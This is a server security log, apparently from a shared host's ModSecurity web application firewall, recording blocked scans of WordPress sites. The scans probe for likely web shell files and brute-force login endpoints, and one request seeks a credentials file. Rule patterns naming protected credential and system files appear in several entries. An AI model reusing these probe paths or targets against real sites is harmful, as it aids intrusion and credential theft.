[Tue May 26 13:53:16.097312 2026] [security2:error] [pid 555743:tid 555962] [client 64.31.3.126:10439] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "64.31.3.126" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVYdMjqAquC0YaxQjC-uwAAAWM"], referer: https://www.cagmedya.com/
[Tue May 26 13:53:16.607244 2026] [security2:error] [pid 560287:tid 560450] [client 185.92.25.106:21431] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/assets/script.js.php"] [unique_id "ahVYdJmX5s6sDS3wJVcgFgAAAKQ"]
[Tue May 26 13:53:16.988396 2026] [security2:error] [pid 560287:tid 560480] [client 185.192.71.239:44287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 239.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/themes/twentytwentythree/patterns/index.php"] [unique_id "ahVYdJmX5s6sDS3wJVcgHQAAAL8"]
[Tue May 26 13:53:17.003425 2026] [security2:error] [pid 560287:tid 560464] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYdJmX5s6sDS3wJVcgEwAAALE"]
[Tue May 26 13:53:17.022681 2026] [security2:error] [pid 560287:tid 560477] [client 64.31.3.126:45609] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "64.31.3.126" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVYdZmX5s6sDS3wJVcgIQAAAL0"], referer: https://www.cagmedya.com/wp-login.php?action=register
[Tue May 26 13:53:17.320191 2026] [security2:error] [pid 560287:tid 560508] [client 208.91.198.85:27526] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahVYdZmX5s6sDS3wJVcgIgAAANo"]
[Tue May 26 13:53:17.963937 2026] [security2:error] [pid 555743:tid 555993] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYdcjqAquC0YaxQjC-zwAAAYI"]
[Tue May 26 13:53:18.371405 2026] [security2:error] [pid 560287:tid 560439] [client 185.92.25.137:40119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/css/colors/sunrise/colors_95.php"] [unique_id "ahVYdpmX5s6sDS3wJVcgQAAAAJo"]
[Tue May 26 13:53:19.481577 2026] [security2:error] [pid 560287:tid 560513] [client 185.92.25.102:27373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 102.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/block-patterns/autoload_classmap.php"] [unique_id "ahVYd5mX5s6sDS3wJVcgYgAAAN8"]
[Tue May 26 13:53:19.683276 2026] [security2:error] [pid 560287:tid 560375] [remote 172.104.164.56:49390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVYd5mX5s6sDS3wJVcgYwAAr1Y"]
[Tue May 26 13:53:20.387209 2026] [security2:error] [pid 560287:tid 560433] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYd5mX5s6sDS3wJVcgcAAAAJQ"]
[Tue May 26 13:53:20.417307 2026] [security2:error] [pid 560287:tid 560442] [client 185.192.71.226:63977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/uploads/wp.php"] [unique_id "ahVYeJmX5s6sDS3wJVcgdgAAAJw"]
[Tue May 26 13:53:20.883556 2026] [security2:error] [pid 560287:tid 560485] [client 62.244.225.226:64228] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVYeJmX5s6sDS3wJVcgfgAAAMQ"]
[Tue May 26 13:53:22.162314 2026] [security2:error] [pid 555743:tid 555971] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYecjqAquC0YaxQjC-9gAAAWw"]
[Tue May 26 13:53:22.449885 2026] [security2:error] [pid 560287:tid 560433] [client 91.230.225.175:34437] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/certificates/about.php"] [unique_id "ahVYepmX5s6sDS3wJVcgrgAAAJQ"]
[Tue May 26 13:53:22.926461 2026] [security2:error] [pid 560287:tid 560457] [client 185.192.71.243:36859] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/cgi-bin/class.api.php"] [unique_id "ahVYepmX5s6sDS3wJVcguAAAAKo"]
[Tue May 26 13:53:23.321306 2026] [security2:error] [pid 560287:tid 560500] [client 185.192.71.232:44371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/cache/index.php"] [unique_id "ahVYe5mX5s6sDS3wJVcgwQAAANM"]
[Tue May 26 13:53:23.851164 2026] [security2:error] [pid 560287:tid 560435] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYe5mX5s6sDS3wJVcgxQAAAJY"]
[Tue May 26 13:53:25.038077 2026] [security2:error] [pid 560287:tid 560529] [client 185.192.71.242:24157] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 242.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/css/colors/blue/file.php"] [unique_id "ahVYfJmX5s6sDS3wJVcg5wAAAO8"]
[Tue May 26 13:53:25.040496 2026] [security2:error] [pid 560287:tid 560425] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYfJmX5s6sDS3wJVcg2wAAAIw"]
[Tue May 26 13:53:25.323017 2026] [security2:error] [pid 560287:tid 560451] [client 129.222.147.134:22143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYfZmX5s6sDS3wJVcg6gAAAKU"]
[Tue May 26 13:53:25.323184 2026] [security2:error] [pid 560287:tid 560451] [client 129.222.147.134:22143] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYfZmX5s6sDS3wJVcg6gAAAKU"]
[Tue May 26 13:53:25.439568 2026] [security2:error] [pid 555743:tid 555910] [client 91.230.225.170:25277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 170.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/edit.php"] [unique_id "ahVYfcjqAquC0YaxQjC_KAAAAS8"]
[Tue May 26 13:53:25.777292 2026] [security2:error] [pid 555743:tid 555892] [client 201.137.246.134:54825] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYfcjqAquC0YaxQjC_KQAAAR0"]
[Tue May 26 13:53:25.794551 2026] [security2:error] [pid 555743:tid 555902] [client 91.230.225.177:30675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/webdb.php"] [unique_id "ahVYfcjqAquC0YaxQjC_LwAAASc"]
[Tue May 26 13:53:25.859667 2026] [security2:error] [pid 555743:tid 555892] [client 201.137.246.134:54825] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "500"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYfcjqAquC0YaxQjC_KQAAAR0"]
[Tue May 26 13:53:26.177411 2026] [security2:error] [pid 555743:tid 555889] [client 185.192.71.235:65365] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/assets/images/doc.php"] [unique_id "ahVYfsjqAquC0YaxQjC_PAAAARo"]
[Tue May 26 13:53:26.602739 2026] [security2:error] [pid 555743:tid 555991] [client 106.192.248.115:54215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYfsjqAquC0YaxQjC_RwAAAYA"]
[Tue May 26 13:53:26.602937 2026] [security2:error] [pid 555743:tid 555991] [client 106.192.248.115:54215] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYfsjqAquC0YaxQjC_RwAAAYA"]
[Tue May 26 13:53:27.009093 2026] [security2:error] [pid 560287:tid 560514] [client 185.192.71.245:25963] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 245.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/file2.php"] [unique_id "ahVYf5mX5s6sDS3wJVchBwAAAOA"]
[Tue May 26 13:53:27.380542 2026] [security2:error] [pid 560287:tid 560534] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYfpmX5s6sDS3wJVchBAAAAPQ"]
[Tue May 26 13:53:27.854387 2026] [security2:error] [pid 560287:tid 560509] [client 185.92.25.96:55299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/ID3/wp-work.php"] [unique_id "ahVYf5mX5s6sDS3wJVchHQAAANs"]
[Tue May 26 13:53:28.343213 2026] [security2:error] [pid 560287:tid 560545] [client 91.230.225.171:55857] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 171.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/alfa.php"] [unique_id "ahVYgJmX5s6sDS3wJVchJgAAAP0"]
[Tue May 26 13:53:29.134086 2026] [security2:error] [pid 560287:tid 560506] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYgJmX5s6sDS3wJVchLQAAANg"]
[Tue May 26 13:53:29.177430 2026] [security2:error] [pid 555743:tid 555982] [client 14.240.144.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYgMjqAquC0YaxQjC_YQAAAXc"]
[Tue May 26 13:53:29.189267 2026] [security2:error] [pid 560287:tid 560461] [client 91.230.225.165:63003] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/css/colors/blue/admin.php"] [unique_id "ahVYgZmX5s6sDS3wJVchQAAAAK4"]
[Tue May 26 13:53:29.587037 2026] [security2:error] [pid 555743:tid 555923] [client 185.192.71.237:52179] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/click.php"] [unique_id "ahVYgcjqAquC0YaxQjC_dAAAATw"]
[Tue May 26 13:53:30.127047 2026] [security2:error] [pid 560287:tid 560424] [client 91.230.225.167:56547] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/.well-known/wp-conflg.php"] [unique_id "ahVYgpmX5s6sDS3wJVchSwAAAIs"]
[Tue May 26 13:53:30.561568 2026] [security2:error] [pid 560287:tid 560542] [client 185.92.25.97:45625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/css/colors/blue/atomlib.php"] [unique_id "ahVYgpmX5s6sDS3wJVchVAAAAPo"]
[Tue May 26 13:53:30.907573 2026] [security2:error] [pid 560287:tid 560418] [client 185.192.71.230:28153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/js/widgets/bypass.php"] [unique_id "ahVYgpmX5s6sDS3wJVchWwAAAIU"]
[Tue May 26 13:53:31.172803 2026] [security2:error] [pid 560287:tid 560467] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYgpmX5s6sDS3wJVchWgAAALQ"]
[Tue May 26 13:53:31.320038 2026] [security2:error] [pid 560287:tid 560546] [client 185.92.25.104:27537] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/random_compat/chosen.php"] [unique_id "ahVYg5mX5s6sDS3wJVchawAAAP4"]
[Tue May 26 13:53:31.475185 2026] [security2:error] [pid 560287:tid 560549] [client 209.141.36.175:59156] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.36.141.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVYg5mX5s6sDS3wJVchbAAAAQE"]
[Tue May 26 13:53:32.064533 2026] [security2:error] [pid 560287:tid 560520] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYg5mX5s6sDS3wJVchcwAAAOY"]
[Tue May 26 13:53:32.083437 2026] [security2:error] [pid 560287:tid 560300] [remote 95.216.117.13:57726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVYg5mX5s6sDS3wJVcheQAAiQw"]
[Tue May 26 13:53:32.397576 2026] [security2:error] [pid 560287:tid 560436] [client 201.137.246.134:47423] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYhJmX5s6sDS3wJVchggAAAJc"]
[Tue May 26 13:53:32.473513 2026] [security2:error] [pid 560287:tid 560436] [client 201.137.246.134:47423] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "500"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYhJmX5s6sDS3wJVchggAAAJc"]
[Tue May 26 13:53:33.118667 2026] [security2:error] [pid 560287:tid 560544] [client 91.230.225.165:25923] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/index.php"] [unique_id "ahVYhZmX5s6sDS3wJVchjQAAAPw"]
[Tue May 26 13:53:33.552764 2026] [security2:error] [pid 560287:tid 560509] [client 185.92.25.104:40615] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/edit.php"] [unique_id "ahVYhZmX5s6sDS3wJVchkAAAANs"]
[Tue May 26 13:53:34.350836 2026] [security2:error] [pid 560287:tid 560516] [client 185.92.25.103:52033] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/WordPressCore/index.php"] [unique_id "ahVYhpmX5s6sDS3wJVchngAAAOI"]
[Tue May 26 13:53:34.482237 2026] [security2:error] [pid 560287:tid 560475] [client 129.222.147.134:65387] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYhpmX5s6sDS3wJVchogAAALs"]
[Tue May 26 13:53:34.485788 2026] [security2:error] [pid 560287:tid 560475] [client 129.222.147.134:65387] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYhpmX5s6sDS3wJVchogAAALs"]
[Tue May 26 13:53:34.776232 2026] [security2:error] [pid 560287:tid 560429] [client 185.192.71.230:62715] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/cgi-bin/autoload_classmap.php"] [unique_id "ahVYhpmX5s6sDS3wJVchpQAAAJA"]
[Tue May 26 13:53:34.880518 2026] [security2:error] [pid 560287:tid 560527] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYhpmX5s6sDS3wJVchoQAAAO0"]
[Tue May 26 13:53:35.257388 2026] [security2:error] [pid 560287:tid 560478] [client 91.230.225.179:59369] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-links-opml.php"] [unique_id "ahVYh5mX5s6sDS3wJVchsgAAAL4"]
[Tue May 26 13:53:36.217721 2026] [security2:error] [pid 555743:tid 555959] [client 185.192.71.233:44807] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/user/network.php"] [unique_id "ahVYiMjqAquC0YaxQjC_xQAAAWA"]
[Tue May 26 13:53:36.315150 2026] [security2:error] [pid 555743:tid 555948] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYh8jqAquC0YaxQjC_uwAAAVU"]
[Tue May 26 13:53:36.648231 2026] [security2:error] [pid 560287:tid 560525] [client 69.12.64.53:59228] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/.env"] [unique_id "ahVYiJmX5s6sDS3wJVchxQAAAOs"]
[Tue May 26 13:53:36.778375 2026] [security2:error] [pid 555743:tid 555917] [client 106.192.248.115:54526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYiMjqAquC0YaxQjC_1QAAATY"]
[Tue May 26 13:53:36.782545 2026] [security2:error] [pid 555743:tid 555917] [client 106.192.248.115:54526] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYiMjqAquC0YaxQjC_1QAAATY"]
[Tue May 26 13:53:37.115739 2026] [security2:error] [pid 560287:tid 560420] [client 185.192.71.237:57635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/atomlib.php"] [unique_id "ahVYiZmX5s6sDS3wJVchywAAAIc"]
